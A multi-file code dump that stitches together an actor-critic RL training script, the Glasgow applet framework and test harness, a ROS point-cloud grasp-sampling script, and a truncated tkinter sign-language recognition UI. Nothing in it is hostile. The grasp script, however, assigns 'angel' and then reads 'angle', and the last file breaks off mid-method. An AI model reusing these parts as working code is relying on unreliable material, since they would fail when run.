feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
        # (2) use the updated critic to compute the advantage, by calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
        # Awkward hacky process runs, because Tensorflow does not like
        # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
__init__.py
|
import re
import argparse
from abc import ABCMeta, abstractmethod
from ..gateware.clockgen import *
__all__ = ["GlasgowAppletError", "GlasgowApplet", "GlasgowAppletTool"]
class GlasgowAppletError(Exception):
"""An exception raised when an applet encounters an error."""
class GlasgowAppletMeta(ABCMeta):
all_applets = {}
def __new__(metacls, clsname, bases, namespace, name=None, **kwargs):
if name is not None:
if name in metacls.all_applets:
raise NameError(f"Applet {name:r} already exists")
namespace["name"] = name
# Any class that overrides interact() no longer has its superclass' custom REPL, so be
# helpful and reset that attribute.
if "has_custom_repl" not in namespace and "interact" in namespace:
namespace["has_custom_repl"] = False
cls = ABCMeta.__new__(metacls, clsname, bases, namespace, **kwargs)
if name is not None:
metacls.all_applets[name] = cls
return cls
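# Registration sketch (hypothetical applet): passing a `name` keyword when
# subclassing registers the class in GlasgowAppletMeta.all_applets:
#   class BlinkyApplet(GlasgowApplet, name="blinky"):
#       help = "blink an LED"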
class GlasgowApplet(metaclass=GlasgowAppletMeta):
preview = False
help = "applet help missing"
description = "applet description missing"
required_revision = "A0"
has_custom_repl = False
@classmethod
def add_build_arguments(cls, parser, access):
access.add_build_arguments(parser)
def derive_clock(self, *args, clock_name=None, **kwargs):
try:
return ClockGen.derive(*args, **kwargs, logger=self.logger, clock_name=clock_name)
except ValueError as e:
if clock_name is None:
raise GlasgowAppletError(e)
else:
raise GlasgowAppletError("clock {}: {}".format(clock_name, e))
@abstractmethod
def build(self, target):
pass
@classmethod
def add_run_arguments(cls, parser, access):
access.add_run_arguments(parser)
async def run_lower(self, cls, device, args, **kwargs):
return await super(cls, self).run(device, args, **kwargs)
@abstractmethod
async def run(self, device, args):
pass
@classmethod
def add_interact_arguments(cls, parser):
pass
async def interact(self, device, args, interface):
pass
class GlasgowAppletTool:
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.tool_cls = cls
cls.applet_cls = applet
cls.logger = applet.logger
@classmethod
def add_arguments(cls, parser):
pass
async def run(self, args):
pass
# -------------------------------------------------------------------------------------------------
import os
import unittest
import functools
import asyncio
import threading
import inspect
import json
from nmigen.back.pysim import *
from ..access.simulation import *
from ..access.direct import *
from ..target.simulation import *
from ..target.hardware import *
from ..device.simulation import *
from ..device.hardware import *
from ..platform.all import GlasgowPlatformRevAB
__all__ += ["GlasgowAppletTestCase", "synthesis_test", "applet_simulation_test",
"applet_hardware_test"]
class MockRecorder:
def __init__(self, case, mocked, fixture):
self.__case = case
self.__mocked = mocked
self.__fixture = fixture
@staticmethod
def __dump_object(obj):
if isinstance(obj, bytes):
return {"__class__": "bytes", "hex": obj.hex()}
if isinstance(obj, bytearray):
return {"__class__": "bytearray", "hex": obj.hex()}
raise TypeError("%s is not serializable" % type(obj))
def __dump_stanza(self, stanza):
if not self.__case._recording:
return
json.dump(fp=self.__fixture, default=self.__dump_object, obj=stanza)
self.__fixture.write("\n")
def __dump_method(self, method, args, kwargs, result, coro):
self.__dump_stanza({
"method": method,
"async": coro,
"args": args,
"kwargs": kwargs,
"result": result
})
def __getattr__(self, attr):
mocked = getattr(self.__mocked, attr)
if inspect.ismethod(mocked):
def wrapper(*args, **kwargs):
result = mocked(*args, **kwargs)
if inspect.isawaitable(result):
async def coro_wrapper():
coro_result = await result
self.__dump_method(attr, args, kwargs, coro_result, coro=True)
return coro_result
return coro_wrapper()
else:
self.__dump_method(attr, args, kwargs, result, coro=False)
return result
return wrapper
return mocked
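# Each recorded call becomes one JSON stanza in the fixture file, e.g.
# (illustrative values):
#   {"method": "read", "async": true, "args": [4], "kwargs": {},
#    "result": {"__class__": "bytes", "hex": "deadbeef"}}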
class MockReplayer:
def __init__(self, case, fixture):
self.__case = case
self.__fixture = fixture
@staticmethod
def __load_object(obj):
if "__class__" not in obj:
return obj
if obj["__class__"] == "bytes":
return bytes.fromhex(obj["hex"])
if obj["__class__"] == "bytearray":
return bytearray.fromhex(obj["hex"])
assert False
def __load(self):
json_str = self.__fixture.readline()
return json.loads(s=json_str, object_hook=self.__load_object)
def __getattr__(self, attr):
json_obj = self.__load()
self.__case.assertEqual(attr, json_obj["method"])
if json_obj["async"]:
async def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
else:
def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
return mock
class GlasgowAppletTestCase(unittest.TestCase):
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.test_cls = cls
cls.applet_cls = applet
def setUp(self):
self.applet = self.applet_cls()
def assertBuilds(self, access="direct", args=[]):
if access == "direct":
target = GlasgowHardwareTarget(revision="A0",
multiplexer_cls=DirectMultiplexer)
access_args = DirectArguments(applet_name=self.applet.name,
default_port="AB", pin_count=16)
else:
raise NotImplementedError
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
try:
parsed_args = parser.parse_args(args)
except SystemExit:
raise AssertionError("argument parsing failed") from None
self.applet.build(target, parsed_args)
target.build_plan().execute()
def _prepare_applet_args(self, args, access_args, interact=False):
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
self.applet.add_run_arguments(parser, access_args)
if interact:
self.applet.add_interact_arguments(parser)
self._parsed_args = parser.parse_args(args)
def _prepare_simulation_target(self):
self.target = GlasgowSimulationTarget()
self.target.submodules.multiplexer = SimulationMultiplexer()
self.device = GlasgowSimulationDevice(self.target)
self.device.demultiplexer = SimulationDemultiplexer(self.device)
def build_simulated_applet(self):
self.applet.build(self.target, self._parsed_args)
async def run_simulated_applet(self):
return await self.applet.run(self.device, self._parsed_args)
def _prepare_hardware_target(self, case, fixture, mode):
assert mode in ("record", "replay")
if mode == "record":
self.device = None # in case the next line raises
self.device = GlasgowHardwareDevice()
self.device.demultiplexer = DirectDemultiplexer(self.device, pipe_count=1)
revision = self.device.revision
else:
self.device = None
revision = "A0"
self.target = GlasgowHardwareTarget(revision=revision,
multiplexer_cls=DirectMultiplexer)
self.applet.build(self.target, self._parsed_args)
self._recording = False
self._recorders = []
old_run_lower = self.applet.run_lower
async def run_lower(cls, device, args):
if mode == "record":
lower_iface = await old_run_lower(cls, device, args)
recorder = MockRecorder(case, lower_iface, fixture)
self._recorders.append(recorder)
return recorder
if mode == "replay":
return MockReplayer(case, fixture)
self.applet.run_lower = run_lower
async def run_hardware_applet(self, mode):
if mode == "record":
await self.device.download_target(self.target.build_plan())
return await self.applet.run(self.device, self._parsed_args)
def synthesis_test(case):
synthesis_available = GlasgowPlatformRevAB().has_required_tools()
return unittest.skipUnless(synthesis_available, "synthesis not available")(case)
def applet_simulation_test(setup, args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
access_args = SimulationArguments(self.applet)
self._prepare_applet_args(args, access_args)
self._prepare_simulation_target()
getattr(self, setup)()
@asyncio.coroutine
def run():
yield from case(self)
sim = Simulator(self.target)
            sim.add_clock(1e-9)
sim.add_sync_process(run)
vcd_name = "{}.vcd".format(case.__name__)
with sim.write_vcd(vcd_name):
sim.run()
os.remove(vcd_name)
return wrapper
return decorator
def applet_hardware_test(setup="run_hardware_applet", args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
fixture_path = os.path.join(os.path.dirname(case.__code__.co_filename), "fixtures",
case.__name__ + ".json")
os.makedirs(os.path.dirname(fixture_path), exist_ok=True)
if os.path.exists(fixture_path):
fixture = open(fixture_path, "r")
mode = "replay"
else:
fixture = open(fixture_path, "w")
mode = "record"
try:
access_args = DirectArguments(self.applet, default_port="AB", pin_count=16)
self._prepare_applet_args(args, access_args)
self._prepare_hardware_target(self, fixture, mode)
exception = None
def run_test():
try:
loop = asyncio.new_event_loop()
iface = loop.run_until_complete(getattr(self, setup)(mode))
self._recording = True
loop.run_until_complete(case(self, iface))
except Exception as e:
nonlocal exception
exception = e
finally:
if self.device is not None:
loop.run_until_complete(self.device.demultiplexer.cancel())
thread = threading.Thread(target=run_test)
thread.start()
thread.join()
if exception is not None:
raise exception
except:
if mode == "record":
os.remove(fixture_path)
raise
finally:
if mode == "record":
if self.device is not None:
self.device.close()
return wrapper
return decorator
|
test.py
|
import rospy
from sensor_msgs.msg import PointCloud2
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
import tf
import numpy as np
# custom pointcloud helper module
import pointclouds
#from pcl import PointCloud
#自定义
import voxelgrid
import pcl
from autolab_core import YamlConfig
from dexnet.grasping import RobotGripper
from dexnet.grasping import GpgGraspSamplerPcl
import os
from pyquaternion import Quaternion
import sys
from os import path
import time
from scipy.stats import mode
import multiprocessing as mp
try:
from gpd_grasp_msgs.msg import GraspConfig
from gpd_grasp_msgs.msg import GraspConfigList
except ImportError:
print("Please install grasp msgs from https://github.com/TAMS-Group/gpd_grasp_msgs in your ROS workspace")
exit()
try:
from mayavi import mlab
except ImportError:
print("Can not import mayavi")
mlab = None
# global config: load the global configuration file
yaml_config = YamlConfig(os.environ['HOME'] + "/code/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
#load the gripper
gripper = RobotGripper.load(gripper_name, os.environ['HOME'] + "/code/PointNetGPD/dex-net/data/grippers")
ags = GpgGraspSamplerPcl(gripper, yaml_config)
using_mp=True
show_single=True
show_mp=True
num_grasps=10
num_workers=10
max_num_samples=50
marker_life_time = 20
rospy.set_param("/robot_at_home", "true")
def cal_grasp(msg, cam_pos_):
"""根据在线采集的点云计算候选的抓取姿态
"""
    #convert the PointCloud2 message into an ndarray points_
points_ = pointclouds.pointcloud2_to_xyz_array(msg)
    #copy points_ and cast all point coordinates to float32
points_ = points_.astype(np.float32)
remove_white = False
if remove_white:
points_ = remove_white_pixel(msg, points_, vis=True)
# begin voxel points
n = 500 # parameter related to voxel method
# gpg improvements, highlights: flexible n parameter for voxelizing.
    #do not run a virtual machine while this line executes, or it tends to hang
points_voxel_ = get_voxel_fun(points_, n)
    #when the cloud has fewer than 2000 points
if len(points_) < 2000: # should be a parameter
while len(points_voxel_) < len(points_)-15:
points_voxel_ = get_voxel_fun(points_, n)
n = n + 100
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
    #the cloud has now been voxel-downsampled
points_ = points_voxel_
remove_points = False
    #whether to remove the supporting plane
if remove_points:
points_ = remove_table_points(points_, vis=True)
    #rebuild the "downsampled" point cloud
point_cloud = pcl.PointCloud(points_)
print(len(points_))
    #create a normal-estimation object
norm = point_cloud.make_NormalEstimation()
tree=point_cloud.make_kdtree()
norm.set_SearchMethod(tree)
    #use the K nearest neighbors around each point to compute its normal
norm.set_KSearch(10) # critical parameter when calculating the norms
normals = norm.compute()
    #convert the normals to an ndarray
surface_normal = normals.to_array()
surface_normal = surface_normal[:, 0:3]
    #vector from each point to the camera position (translation only, no orientation)
vector_p2cam = cam_pos_ - points_
#print(vector_p2cam)
#print(cam_pos_)
"""
np.linalg.norm(vector_p2cam, axis=1) 默认求2范数,axis=1 代表按行向量处理,求多个行向量的2范数(求模)
np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1) 将其调整为m行 1列
整句话的含义是,将vector_p2cam归一化,单位化
"""
vector_p2cam = vector_p2cam / np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1)
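    # An illustrative check of the normalization above (values hypothetical):
    #   v = np.array([[3.0, 4.0, 0.0]])
    #   v / np.linalg.norm(v, axis=1).reshape(-1, 1)  ->  array([[0.6, 0.8, 0.0]])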
    #dot the unit point-to-camera vectors with the unit surface normals, to compute the angle between them below
tmp = np.dot(vector_p2cam, surface_normal.T).diagonal()
#print(vector_p2cam)
#print(surface_normal.T)
#print(tmp)
"""
np.clip(tmp, -1.0, 1.0) 截取函数,将tmp中的值,都限制在-1.0到1.0之间,大于1的变成1,小于-1的记为-1
np.arccos() 求解反余弦,求夹角
"""
angel = np.arccos(np.clip(tmp, -1.0, 1.0))
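    # An illustrative example of why the clip matters (value hypothetical):
    #   np.arccos(1.0000001) is NaN, but np.arccos(np.clip(1.0000001, -1.0, 1.0))
    #   is 0.0, so rounding slightly past +/-1 cannot poison the angles.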
    #print(angle)
    #find normals whose angle to the view vector exceeds 90 degrees (these normals are assumed flipped)
    wrong_dir_norm = np.where(angle > np.pi * 0.5)[0]
    #print(np.where(angle > np.pi * 0.5))
#print(wrong_dir_norm)
#print(len(wrong_dir_norm))
    #create a len(angle)-by-3 array of ones
    tmp = np.ones([len(angle), 3])
    #set the rows of the flipped normals to -1
tmp[wrong_dir_norm, :] = -1
    #element-wise multiply with the surface normals to flip the wrong-facing ones back
surface_normal = surface_normal * tmp
    #only points above a height threshold over the table are used as detection points
select_point_above_table = 0.070
#modify of gpg: make it as a parameter. avoid select points near the table.
    #check the z value of each point and keep those greater than select_point_above_table
points_for_sample = points_[np.where(points_[:, 2] > select_point_above_table)[0]]
print("待抓取的点数量为{}".format(len(points_for_sample)))
if len(points_for_sample) == 0:
rospy.loginfo("Can not seltect point, maybe the point cloud is too low?")
return [], points_, surface_normal
yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = 0.4
if not using_mp:
rospy.loginfo("Begin cal grasps using single thread, slow!")
"""
"""
grasps_together_ = ags.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps,
max_num_samples=max_num_samples, show_final_grasp=show_single)
else:
# begin parallel grasp:
rospy.loginfo("Begin cal grasps using parallel!")
def grasp_task(num_grasps_, ags_, queue_):
ret = ags_.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps_,
max_num_samples=max_num_samples, show_final_grasp=False)
queue_.put(ret)
queue = mp.Queue()
num_grasps_p_worker = int(num_grasps/num_workers)
workers = [mp.Process(target=grasp_task, args=(num_grasps_p_worker, ags, queue)) for _ in range(num_workers)]
        for worker in workers:
            worker.start()
grasps_together_ = []
for i in range(num_workers):
grasps_together_ = grasps_together_ + queue.get()
rospy.loginfo("Finish mp processing!")
        #visualize the grasps computed by the worker processes
if show_mp:
ags.show_all_grasps(points_, grasps_together_)
ags.show_points(points_, scale_factor=0.002)
mlab.show()
rospy.loginfo("Grasp sampler finish, generated {} grasps.".format(len(grasps_together_)))
    #return the grasps (mainly the grasp frames), all scene points, and the PCL-estimated surface normals
return grasps_together_, points_, surface_normal
def show_grasp_marker(marker_array_, real_grasp_, gripper_, color_, lifetime_):
"""
show grasp using marker使用marker来显示抓取
:param marker_array_: marker array
:param real_grasp_: [0] position, [1] approach [2] binormal [3] minor pc
:param gripper_: gripper parameter of a grasp
:param color_: color of the gripper 显示夹爪的颜色
:param lifetime_: time for showing the maker marker的显示时间长短
:return: return add makers to the maker array
"""
hh = gripper_.hand_height
fw = gripper_.real_finger_width
hod = gripper_.hand_outer_diameter
hd = gripper_.real_hand_depth
open_w = hod - fw * 2
approach = real_grasp_[1]
binormal = real_grasp_[2]
minor_pc = real_grasp_[3]
grasp_bottom_center = real_grasp_[4] - approach * (gripper_.real_hand_depth - gripper_.hand_depth)
rotation = np.vstack([approach, binormal, minor_pc]).T
qua = Quaternion(matrix=rotation)
marker_bottom_pos = grasp_bottom_center - approach * hh * 0.5
marker_left_pos = grasp_bottom_center - binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
marker_right_pos = grasp_bottom_center + binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
show_marker(marker_array_, marker_bottom_pos, qua, np.array([hh, hod, hh]), color_, lifetime_)
show_marker(marker_array_, marker_left_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
show_marker(marker_array_, marker_right_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
def remove_grasp_outside_tray(grasps_, points_):
x_min = points_[:, 0].min()
x_max = points_[:, 0].max()
y_min = points_[:, 1].min()
y_max = points_[:, 1].max()
valid_grasp_ind_ = []
for i in range(len(grasps_)):
grasp_bottom_center = grasps_[i][4]
approach_normal = grasps_[i][1]
major_pc = grasps_[i][2]
hand_points_ = ags.get_hand_points(grasp_bottom_center, approach_normal, major_pc)
finger_points_ = hand_points_[[1, 2, 3, 4, 9, 10, 13, 14], :]
# aa = points_[:, :2] - finger_points_[0][:2] # todo: work of remove outside grasp not finished.
# from IPython import embed;embed()
a = finger_points_[:, 0] < x_min
b = finger_points_[:, 0] > x_max
c = finger_points_[:, 1] < y_min
d = finger_points_[:, 1] > y_max
if np.sum(a) + np.sum(b) + np.sum(c) + np.sum(d) == 0:
valid_grasp_ind_.append(i)
grasps_inside_ = [grasps_[i] for i in valid_grasp_ind_]
rospy.loginfo("gpg got {} grasps, after remove grasp outside tray, {} grasps left".format(len(grasps_),
len(grasps_inside_)))
return grasps_inside_
def get_voxel_fun(points_, n):
get_voxel = voxelgrid.VoxelGrid(points_, n_x=n, n_y=n, n_z=n)
get_voxel.compute()
points_voxel_ = get_voxel.voxel_centers[get_voxel.voxel_n]
points_voxel_ = np.unique(points_voxel_, axis=0)
return points_voxel_
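# A hypothetical usage sketch of get_voxel_fun (the input array is illustrative):
#   pts = np.random.rand(5000, 3).astype(np.float32)
#   down = get_voxel_fun(pts, n=500)  # one representative point per occupied voxel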
def show_marker(marker_array_, pos_, ori_, scale_, color_, lifetime_):
"""显示标注物体
"""
marker_ = Marker()
marker_.header.frame_id = "/ar_marker_6"
# marker_.header.stamp = rospy.Time.now()
marker_.type = marker_.CUBE
marker_.action = marker_.ADD
marker_.pose.position.x = pos_[0]
marker_.pose.position.y = pos_[1]
marker_.pose.position.z = pos_[2]
marker_.pose.orientation.x = ori_[1]
marker_.pose.orientation.y = ori_[2]
marker_.pose.orientation.z = ori_[3]
marker_.pose.orientation.w = ori_[0]
marker_.lifetime = rospy.Duration.from_sec(lifetime_)
marker_.scale.x = scale_[0]
marker_.scale.y = scale_[1]
marker_.scale.z = scale_[2]
marker_.color.a = 0.5
red_, green_, blue_ = color_
marker_.color.r = red_
marker_.color.g = green_
marker_.color.b = blue_
marker_array_.markers.append(marker_)
if __name__ == '__main__':
rospy.init_node('grasp_tf_broadcaster', anonymous=True)
    #create publishers
pub1 = rospy.Publisher('gripper_vis', MarkerArray, queue_size=1)
    #publish the detected grasps
pub2 = rospy.Publisher('/detect_grasps/clustered_grasps', GraspConfigList, queue_size=1)
    #publish the test points topic
pub3 = rospy.Publisher('/test_points', PointCloud2, queue_size=1)
rate = rospy.Rate(10)
    #camera position list
cam_pos = []
    #create the TF listener
listener = tf.TransformListener()
    #flag: whether the transform has been obtained
get_transform = False
    #wait until tf finds the transform between the '/table_top' and
    # '/kinect2_ir_optical_frame' frames
while not get_transform:
try:
            #try to look up the transform between the kinect2 camera and the table
#cam_pos, _ = listener.lookupTransform('/table_top', '/kinect2_ir_optical_frame', rospy.Time(0))
            #cam_pos is the camera translation, not its rotation
cam_pos, _ = listener.lookupTransform('/ar_marker_6', '/kinect2_rgb_optical_frame', rospy.Time(0))
get_transform = True
rospy.loginfo("got transform complete")
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
while not rospy.is_shutdown():
rospy.loginfo("rospy is waiting for message: /table_top_points")
"""点云数据的名称是/table_top_points
对象是kinect_data 类形是 PointCloud2类型
"""
#kinect_data = rospy.wait_for_message("/table_top_points", PointCloud2)
kinect_data_ = rospy.wait_for_message("/table_top_points", PointCloud2)
kinect_data = rospy.wait_for_message("/table_top_points_subsampled", PointCloud2)
real_good_grasp = []
real_bad_grasp = []
real_score_value = []
if kinect_data.data == '':
rospy.loginfo("There is no points on the table, waiting...")
continue
        #absolute path of the directory containing this file
path=os.path.dirname(os.path.abspath(__file__))
        #make sure the current directory is the working directory
os.chdir(path)
"""根据Kinect读取到的场景点云,使用gpd检测候选的抓取?
输入:
kinect_data读取的点云数据
cam_pos Kinect与桌子标签之间的距离
real_grasp 猜测此时的
points
normals_cal
"""
real_grasp, points, normals_cal = cal_grasp(kinect_data, cam_pos)
        #tray: if a tray is present
if True:
            #remove grasps caused by the area outside the tray
real_grasp = remove_grasp_outside_tray(real_grasp, points)
        #estimate the number of points inside a grasp
check_grasp_points_num = True # evaluate the number of points in a grasp
"""
等效于
if check_grasp_points_num:
check_hand_points_fun(real_grasp)
else:
0
"""
#check_hand_points_fun(real_grasp) if check_grasp_points_num else 0
        #compute the point cloud inside the gripper for each grasp
#in_ind, in_ind_points = collect_pc(real_grasp, points)
score = [] # should be 0 or 1
score_value = [] # should be float [0, 1]
ind_good_grasp = []
ind_bad_grasp = []
        #count the good and bad grasps
print("Got {} grasps".format(len(real_grasp)))
real_bad_grasp = real_grasp
        # end of grasp detection
marker_array = MarkerArray()
marker_array_single = MarkerArray()
grasp_msg_list = GraspConfigList()
for i in range(len(real_bad_grasp)):
show_grasp_marker(marker_array, real_bad_grasp[i], gripper, (1, 0, 0), marker_life_time)
id_ = 0
for m in marker_array.markers:
m.id = id_
id_ += 1
grasp_msg_list.header.stamp = rospy.Time.now()
grasp_msg_list.header.frame_id = "/ar_marker_6"
# from IPython import embed;embed()
if True:
i = 0
for m in marker_array_single.markers:
m.id = id_
id_ += 1
pub1.publish(marker_array)
rospy.sleep(4)
pub1.publish(marker_array_single)
rospy.loginfo(" Publishing grasp pose to rviz using marker array and good grasp pose")
rate.sleep()
|
userInterface.py
|
import sqlite3
import threading
import time
import tkinter as tk
from tkinter import INSERT
from tkinter import Menu
from tkinter import messagebox as msg
from tkinter import ttk
from tkinter import END
from tkinter import scrolledtext
import cv2
from PIL import ImageTk, Image
from tensorflow.keras.models import model_from_json
import operator
class ThreadRunner:
"""
ThreadRunner runs the process to get the current frame from the video source
and it uses the trained model to predict characters from hands on the video
source. The process had to be separated from the UI thread to avoid freezes.
There are three methods to get frame, roi frame and predicted text
get_frame() -> gets the current frame
get_roi_frame() -> gets the current roi frame
get_prediction() -> gets the current predicted text
"""
def __init__(self, video_source=0, width=None, height=None, fps=None):
self.video_source = video_source
self.width = width
self.height = height
self.fps = fps
# Open the video source
self.vid = cv2.VideoCapture(video_source)
if not self.vid.isOpened():
raise ValueError("ThreadRunner Unable to open video source", video_source)
# Set the height according to the width
if self.width and not self.height:
ratio = self.width / self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = int(self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT) * ratio)
# Get video source width and height if width and height are not set
if not self.width:
self.width = int(self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)) # convert float to int
if not self.height:
self.height = int(self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)) # convert float to int
if not self.fps:
self.fps = int(self.vid.get(cv2.CAP_PROP_FPS)) # convert float to int
# set rectangle points relatively with the source width and height
self.recX1 = int(self.width * 0.5)
self.recY1 = int(self.width * 0.10)
self.recX2 = int(self.width * 0.95)
self.recY2 = int(self.width * 0.50)
# default required values at start
self.ret = False
self.frame = None
self.roi = None
self.roi_ret = False
self.roi_frame = None
self.running = True
self.model = None
self.predicted_text = ""
self.categories = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4',
5: '5', 6: '6', 7: '7', 8: '8', 9: '9',
10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E',
15: 'F', 16: 'G', 17: 'H', 18: 'I', 19: 'K',
20: 'L', 21: 'M', 22: 'N', 23: 'O', 24: 'P',
25: 'R', 26: 'S', 27: 'T', 28: 'U', 29: 'V',
30: 'Y', 31: 'Z'}
self.prediction_result = None
self.current_prediction = None
self.prediction_count = 0
self.process_timer = 0
# start thread
self.thread = threading.Thread(target=self.process)
self.thread.start()
def process(self):
# get the model from json and load the weights
with open("model-bw.json", "r") as mj:
self.model = model_from_json(mj.read())
self.model.load_weights("model-bw.h5")
# start video streaming and predicting process
while self.running:
ret, frame = self.vid.read()
if ret:
# process image
frame = cv2.resize(frame, (self.width, self.height))
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.flip(frame, flipCode=1)
cv2.rectangle(frame, (self.recX1, self.recY1), (self.recX2, self.recY2), (255, 255, 0), 1)
self.roi = frame[self.recY1:self.recY2, self.recX1:self.recX2]
self.roi = cv2.resize(self.roi, (64, 64))
self.roi = cv2.cvtColor(self.roi, cv2.COLOR_BGR2GRAY)
roi_ret, roi_frame = cv2.threshold(self.roi, 120, 255, cv2.THRESH_BINARY)
self.prediction_result = self.model.predict(roi_frame.reshape(1, 64, 64, 1))
                    # build a {label: probability} map from the model output,
                    # reusing the categories table defined in __init__
